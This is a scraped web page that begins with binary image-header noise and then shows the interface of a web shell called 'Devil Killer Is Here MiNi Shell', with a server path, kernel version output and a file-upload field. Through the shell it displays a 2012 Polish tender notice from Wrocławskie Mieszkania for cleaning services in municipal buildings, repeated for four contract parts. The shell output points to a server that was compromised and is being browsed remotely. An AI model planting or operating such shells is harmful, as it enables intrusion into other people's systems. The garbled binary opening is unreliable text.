JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120517/159740-N-2012.html

<p class="kh_header"><b>Wrocław: Usługi porządkowo - sanitarne i sprzątania w  budynkach 
stanowiących własność Gminy Wrocław, znak postępowania: WM/SZP/PN/18/2012/G</b><br>
<b>Numer ogłoszenia: 159740 - 2012; data zamieszczenia: 17.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wrocławskie Mieszkania Sp. z o.o. , ul. Mikołaja Reja 53-55, 50-343 Wrocław, woj. dolnośląskie, tel. 71 3235700, faks 71 3235750.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wm.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi porządkowo - sanitarne i sprzątania w  budynkach 
stanowiących własność Gminy Wrocław, znak postępowania: WM/SZP/PN/18/2012/G.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Rodzaj zamówienia: usługa.
2.Przedmiotem zamówienia są usługi porządkowo - sanitarne i sprzątania w  budynkach stanowiących własność Gminy Wrocław, zgodnie z nomenklaturą CPV (Wspólny Słownik Zamówień 90.60.00.00-3 usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane, 90.91.00.00-9 usługi sprzątania.
3.Przez usługi porządkowo - sanitarne i sprzątania w budynkach gminnych Zamawiający rozumie wykonywanie czynności określonych w Opisie przedmiotu zamówienia stanowiącym załącznik nr 5 do SIWZ związanych z utrzymaniem czystości i porządku w częściach wspólnych budynków stanowiących własność Gminy Wrocław objętych ewidencją zasobu prowadzoną przez spółkę Wrocławskie Mieszkania Sp. z o.o., które będą rozliczane na podstawie miesięcznych cen jednostkowych netto za usługi porządkowo - sanitarne i sprzątania 1 m2 powierzchni wspólnego użytku.
4.Zamówienie określa maksymalne potrzeby Zamawiającego. Zamawiający zastrzega sobie prawo do niezrealizowania całości zamówienia. Zamawiający dopuszcza możliwość wyłączenia poszczególnych budynków z wykonywania usług porządkowo - sanitarnych i sprzątania w następujących przypadkach: 
a)sprzedaży pierwszego lokalu w budynku stanowiącym własność Gminy Wrocław i utraty przez ten budynek statusu nieruchomości komunalnej,
b)wyłączenia budynku z eksploatacji (np. rozbiórka, remont),
c)przekazania nieruchomości objętej umową innemu podmiotowi w zarządzanie.
Zamawiający powiadomi pisemnie Wykonawcę o zmianie adresu nieruchomości wymienionych w załączniku nr 2 do umowy lub o wyłączeniu budynku z wykonywania usług porządkowo - sanitarnych i sprzątania. Wykonawcy nie przysługują z tytułu zmniejszenia zakresu umowy roszczenia odszkodowawcze. 
5.Zakres usług objętych przedmiotem zamówienia określa załącznik nr 5 do SIWZ. 
6.Szczegółowy wykaz zasobów Gminy, na których realizowany będzie przedmiot zamówienia zawiera załącznik nr 6 do SIWZ. 
Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne zadania. 
Zamówienie podzielone jest na cztery następujące zadania:
ZADANIE NR 1 - usługa realizowana jest na obszarze rejonu C, L: w ok. 116 budynkach gminnych  o przybliżonej, łącznej powierzchni przeznaczanej do wykonania usługi 41.438,47 m2 
ZADANIE NR 2 - usługa realizowana jest na obszarze rejonu D, E: w ok. 74 budynkach o przybliżonej gminnych, łącznej powierzchni przeznaczanej do wykonania usługi 23.151,65 m2 
ZADANIE NR 3 - usługa realizowana jest na obszarze rejonu J, K: w ok. 274 budynkach gminnych o przybliżonej łącznej powierzchni przeznaczanej do wykonania usługi 36.532,68 m2 
ZADANIE NR 4 - usługa realizowana jest na obszarze rejonu M, N: w ok. 76 budynkach gminnych o przybliżonej, łącznej powierzchni przeznaczanej do wykonania usługi 20.386,05 m2 .
Termin wykonania zamówienia: 12 miesięcy od dnia zawarcia umowy, nie wcześniej jednak niż od dnia 12 sierpnia 2012 roku w każdym zadaniu z zastrzeżeniem, że umowa ulega rozwiązaniu w danym zadaniu przed tym terminem w razie zrealizowania przedmiotu umowy za wynagrodzeniem łącznym brutto określonym w § 5 ust.1 umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 12.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna, ze warunek udziału w postepowaniu został spełniony na
podstawie złozonego oswiadczenia z art. 22 ust. 1 ustawy Pzp (załacznik nr 2 do SIWZ).
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie co najmniej jedną usługę polegającą na sprzątaniu nieruchomości mieszkalnych i/lub użytkowych o wartości nie mniejszej niż 50.000,00 zł. brutto w ramach jednej umowy.
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna, ze warunek udziału w postepowaniu został spełniony na
podstawie złozonego oswiadczenia z art. 22 ust. 1 ustawy Pzp (załacznik nr 2 do SIWZ).
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna, ze warunek udziału w postepowaniu został spełniony na
podstawie złozonego oswiadczenia z art. 22 ust. 1 ustawy Pzp (załacznik nr 2 do SIWZ).
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna, ze warunek udziału w postepowaniu został spełniony na
podstawie złozonego oswiadczenia z art. 22 ust. 1 ustawy Pzp (załacznik nr 2 do SIWZ).
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
2.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
a)składają wspólnie oświadczenie potwierdzające spełnienie warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Pzp i dokumenty wymienione w pkt 1 rozdz. X SIWZ, a ponadto
b)każdy z Wykonawców składa oddzielnie oświadczenie o braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 ustawy Pzp i dokumenty wymienione w pkt 2 rozdz. X SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony dopuszczają możliwość zmiany w trakcie realizacji umowy:
1)	kluczowego  personelu wykonawcy,
2)	zmiany podwykonawców *.
2.	Powyższe zmiany mogą być dokonane za uprzednią zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę lub podwykonawcę.*
* pozostawić odpowiednio do rozstrzygnięcia postępowania
3.	Zamawiający dopuszcza możliwość zmiany cen wskutek zmiany stawki podatku VAT. Zmiana ustawowej wysokości podatku VAT powoduje odpowiednią zmianę łącznego wynagrodzenia od daty wprowadzenia zmiany. Naliczenie podatku VAT w nowej wysokości dopuszcza się tylko od wynagrodzenia za tę część umowy realizowaną po dniu wejścia w życie przepisów ustalających zmiany stawki VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wm.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wrocławskie Mieszkania Sp. z o.o. we Wrocławiu, ul. Mikołaja Reja 53-55,  50 - 343 Wrocław, pok. 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2012 godzina 09:00, miejsce: Wrocławskie Mieszkania Sp. z o.o. we Wrocławiu, ul. Mikołaja Reja 53-55,  50 - 343 Wrocław (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Spółka Wrocławskie Mieszkania Sp. z o.o. występuje w imieniu Gminy Wrocław na podstawie Pełnomocnictwa nr 9/III/Z/11 Prezydenta Miasta Wrocław z dnia 10.03.2011r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1 - usługa realizowana jest na obszarze rejonu C, L: w ok. 116 budynkach gminnych  o przybliżonej, łącznej powierzchni przeznaczanej do wykonania usługi 41.438,47 m2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzaj zamówienia: usługa.
2.Przedmiotem zamówienia są usługi porządkowo - sanitarne i sprzątania w  budynkach stanowiących własność Gminy Wrocław, zgodnie z nomenklaturą CPV Wspólny Słownik Zamówień 
90.60.00.00-3 usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane, 90.91.00.00-9 usługi sprzątania.
3.Przez usługi porządkowo - sanitarne i sprzątania w budynkach gminnych Zamawiający rozumie wykonywanie czynności określonych w Opisie przedmiotu zamówienia stanowiącym załącznik nr 5 do SIWZ związanych z utrzymaniem czystości i porządku w częściach wspólnych budynków stanowiących własność Gminy Wrocław objętych ewidencją zasobu prowadzoną przez spółkę Wrocławskie Mieszkania Sp. z o.o., które będą rozliczane na podstawie miesięcznych cen jednostkowych netto za usługi porządkowo - sanitarne i sprzątania 1 m2 powierzchni wspólnego użytku.
4.Zamówienie określa maksymalne potrzeby Zamawiającego. Zamawiający zastrzega sobie prawo do niezrealizowania całości zamówienia. Zamawiający dopuszcza możliwość wyłączenia poszczególnych budynków z wykonywania usług porządkowo - sanitarnych i sprzątania w następujących przypadkach: 
a)sprzedaży pierwszego lokalu w budynku stanowiącym własność Gminy Wrocław i utraty przez ten budynek statusu nieruchomości komunalnej,
b)wyłączenia budynku z eksploatacji (np. rozbiórka, remont),
c)przekazania nieruchomości objętej umową innemu podmiotowi w zarządzanie.
Zamawiający powiadomi pisemnie Wykonawcę o zmianie adresu nieruchomości wymienionych w załączniku nr 2 do umowy lub o wyłączeniu budynku z wykonywania usług porządkowo - sanitarnych i sprzątania. Wykonawcy nie przysługują z tytułu zmniejszenia zakresu umowy roszczenia odszkodowawcze. 
5.Zakres usług objętych przedmiotem zamówienia określa załącznik nr 5 do SIWZ. 
6.Szczegółowy wykaz zasobów Gminy, na których realizowany będzie przedmiot zamówienia zawiera załącznik nr 6 do SIWZ. 
Termin wykonania zamówienia: 12 miesięcy od dnia zawarcia umowy, nie wcześniej jednak niż od dnia 12 sierpnia 2012 roku w każdym zadaniu z zastrzeżeniem, że umowa ulega rozwiązaniu w danym zadaniu przed tym terminem w razie zrealizowania przedmiotu umowy za wynagrodzeniem łącznym brutto określonym w § 5 ust.1 umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2 - usługa realizowana jest na obszarze rejonu D, E: w ok. 74 budynkach o przybliżonej gminnych, łącznej powierzchni przeznaczanej do wykonania usługi 23.151,65 m2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzaj zamówienia: usługa.
2.Przedmiotem zamówienia są usługi porządkowo - sanitarne i sprzątania w  budynkach stanowiących własność Gminy Wrocław, zgodnie z nomenklaturą CPV Wspólny Słownik Zamówień 
90.60.00.00-3 usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane, 90.91.00.00-9 usługi sprzątania.
3.Przez usługi porządkowo - sanitarne i sprzątania w budynkach gminnych Zamawiający rozumie wykonywanie czynności określonych w Opisie przedmiotu zamówienia stanowiącym załącznik nr 5 do SIWZ związanych z utrzymaniem czystości i porządku w częściach wspólnych budynków stanowiących własność Gminy Wrocław objętych ewidencją zasobu prowadzoną przez spółkę Wrocławskie Mieszkania Sp. z o.o., które będą rozliczane na podstawie miesięcznych cen jednostkowych netto za usługi porządkowo - sanitarne i sprzątania 1 m2 powierzchni wspólnego użytku.
4.Zamówienie określa maksymalne potrzeby Zamawiającego. Zamawiający zastrzega sobie prawo do niezrealizowania całości zamówienia. Zamawiający dopuszcza możliwość wyłączenia poszczególnych budynków z wykonywania usług porządkowo - sanitarnych i sprzątania w następujących przypadkach: 
a)sprzedaży pierwszego lokalu w budynku stanowiącym własność Gminy Wrocław i utraty przez ten budynek statusu nieruchomości komunalnej,
b)wyłączenia budynku z eksploatacji (np. rozbiórka, remont),
c)przekazania nieruchomości objętej umową innemu podmiotowi w zarządzanie.
Zamawiający powiadomi pisemnie Wykonawcę o zmianie adresu nieruchomości wymienionych w załączniku nr 2 do umowy lub o wyłączeniu budynku z wykonywania usług porządkowo - sanitarnych i sprzątania. Wykonawcy nie przysługują z tytułu zmniejszenia zakresu umowy roszczenia odszkodowawcze. 
5.Zakres usług objętych przedmiotem zamówienia określa załącznik nr 5 do SIWZ. 
6.Szczegółowy wykaz zasobów Gminy, na których realizowany będzie przedmiot zamówienia zawiera załącznik nr 6 do SIWZ. 
Termin wykonania zamówienia: 12 miesięcy od dnia zawarcia umowy, nie wcześniej jednak niż od dnia 12 sierpnia 2012 roku w każdym zadaniu z zastrzeżeniem, że umowa ulega rozwiązaniu w danym zadaniu przed tym terminem w razie zrealizowania przedmiotu umowy za wynagrodzeniem łącznym brutto określonym w § 5 ust.1 umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3 - usługa realizowana jest na obszarze rejonu J, K: w ok. 274 budynkach gminnych o przybliżonej łącznej powierzchni przeznaczanej do wykonania usługi 36.532,68 m2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzaj zamówienia: usługa.
2.Przedmiotem zamówienia są usługi porządkowo - sanitarne i sprzątania w  budynkach stanowiących własność Gminy Wrocław, zgodnie z nomenklaturą CPV Wspólny Słownik Zamówień 
90.60.00.00-3 usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane, 90.91.00.00-9 usługi sprzątania.
3.Przez usługi porządkowo - sanitarne i sprzątania w budynkach gminnych Zamawiający rozumie wykonywanie czynności określonych w Opisie przedmiotu zamówienia stanowiącym załącznik nr 5 do SIWZ związanych z utrzymaniem czystości i porządku w częściach wspólnych budynków stanowiących własność Gminy Wrocław objętych ewidencją zasobu prowadzoną przez spółkę Wrocławskie Mieszkania Sp. z o.o., które będą rozliczane na podstawie miesięcznych cen jednostkowych netto za usługi porządkowo - sanitarne i sprzątania 1 m2 powierzchni wspólnego użytku.
4.Zamówienie określa maksymalne potrzeby Zamawiającego. Zamawiający zastrzega sobie prawo do niezrealizowania całości zamówienia. Zamawiający dopuszcza możliwość wyłączenia poszczególnych budynków z wykonywania usług porządkowo - sanitarnych i sprzątania w następujących przypadkach: 
a)sprzedaży pierwszego lokalu w budynku stanowiącym własność Gminy Wrocław i utraty przez ten budynek statusu nieruchomości komunalnej,
b)wyłączenia budynku z eksploatacji (np. rozbiórka, remont),
c)przekazania nieruchomości objętej umową innemu podmiotowi w zarządzanie.
Zamawiający powiadomi pisemnie Wykonawcę o zmianie adresu nieruchomości wymienionych w załączniku nr 2 do umowy lub o wyłączeniu budynku z wykonywania usług porządkowo - sanitarnych i sprzątania. Wykonawcy nie przysługują z tytułu zmniejszenia zakresu umowy roszczenia odszkodowawcze. 
5.Zakres usług objętych przedmiotem zamówienia określa załącznik nr 5 do SIWZ. 
6.Szczegółowy wykaz zasobów Gminy, na których realizowany będzie przedmiot zamówienia zawiera załącznik nr 6 do SIWZ. 
Termin wykonania zamówienia: 12 miesięcy od dnia zawarcia umowy, nie wcześniej jednak niż od dnia 12 sierpnia 2012 roku w każdym zadaniu z zastrzeżeniem, że umowa ulega rozwiązaniu w danym zadaniu przed tym terminem w razie zrealizowania przedmiotu umowy za wynagrodzeniem łącznym brutto określonym w § 5 ust.1 umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4 - usługa realizowana jest na obszarze rejonu M, N: w ok. 76 budynkach gminnych o przybliżonej, łącznej powierzchni przeznaczanej do wykonania usługi 20.386,05 m2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzaj zamówienia: usługa.
2.Przedmiotem zamówienia są usługi porządkowo - sanitarne i sprzątania w  budynkach stanowiących własność Gminy Wrocław, zgodnie z nomenklaturą CPV (Wspólny Słownik Zamówień 
90.60.00.00-3 usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane, 90.91.00.00-9 usługi sprzątania.
